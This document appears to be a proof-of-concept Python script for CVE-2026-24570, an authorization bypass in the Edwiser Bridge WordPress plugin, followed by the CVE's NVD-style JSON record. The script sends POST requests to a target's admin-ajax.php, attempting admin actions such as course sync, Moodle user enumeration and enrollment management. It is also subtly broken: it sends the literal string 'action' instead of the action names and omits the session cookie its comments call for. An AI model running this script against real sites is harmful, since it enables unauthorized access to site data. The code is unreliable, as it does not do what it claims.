CVE-2026-24570

import requests import sys # CVE-2026-24570 PoC - Edwiser Bridge Authorization Bypass # Target: WordPress site with Edwiser Bridge plugin <= 4.3.2 def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2026-24570""" # Get WordPress nonce and test authorization bypass target = target_url.rstrip('/') # Step 1: Identify Edwiser Bridge AJAX endpoints ajax_endpoints = [ f'{target}/wp-admin/admin-ajax.php', f'{target}/wp-admin/admin.php?page=edwiser_bridge' ] print(f'[*] Testing {target} for CVE-2026-24570') print(f'[*] Checking Edwiser Bridge endpoints...') # Step 2: Test low-privilege access to admin functions # This PoC demonstrates attempting to access admin functions # with a low-privilege user session test_payloads = [ ('action=eb_sync_course_data', 'Course data sync'), ('action=eb_get_moodle_users', 'Moodle users enumeration'), ('action=eb_manage_enrollment', 'Enrollment management') ] for payload, description in test_payloads: print(f'[*] Testing: {description}') # Note: In real attack, attacker would include valid low-priv cookie # and craft request to unauthorized endpoint data = { 'action': payload.split('=')[0].split('=')[0], '_wpnonce': 'attacker_provided_or_missing', 'post_id': 1 # Example course ID } try: response = requests.post( f'{target}/wp-admin/admin-ajax.php', data=data, timeout=10 ) # Check for successful unauthorized access if response.status_code == 200: # Check if response indicates successful operation # without proper authorization check if 'success' in response.text or len(response.text) > 50: print(f'[+] Potential vulnerability: {description}') print(f' Response length: {len(response.text)}') except requests.RequestException as e: print(f'[-] Request failed: {e}') print('[*] Scan complete. Manual verification recommended.') if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2026-24570-poc.py <target_url>') print('Example: python cve-2026-24570-poc.py http://example.com') sys.exit(1) check_vulnerability(sys.argv[1])

{"cve": {"id": "CVE-2026-24570", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:14.897", "lastModified": "2026-04-28T15:16:15.517", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in WisdmLabs Edwiser Bridge edwiser-bridge allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Edwiser Bridge: from n/a through <= 4.3.2."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en WisdmLabs Edwiser Bridge edwiser-bridge permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Edwiser Bridge: desde n/a hasta &lt;= 4.3.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/edwiser-bridge/vulnerability/wordpress-edwiser-bridge-plugin-4-3-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}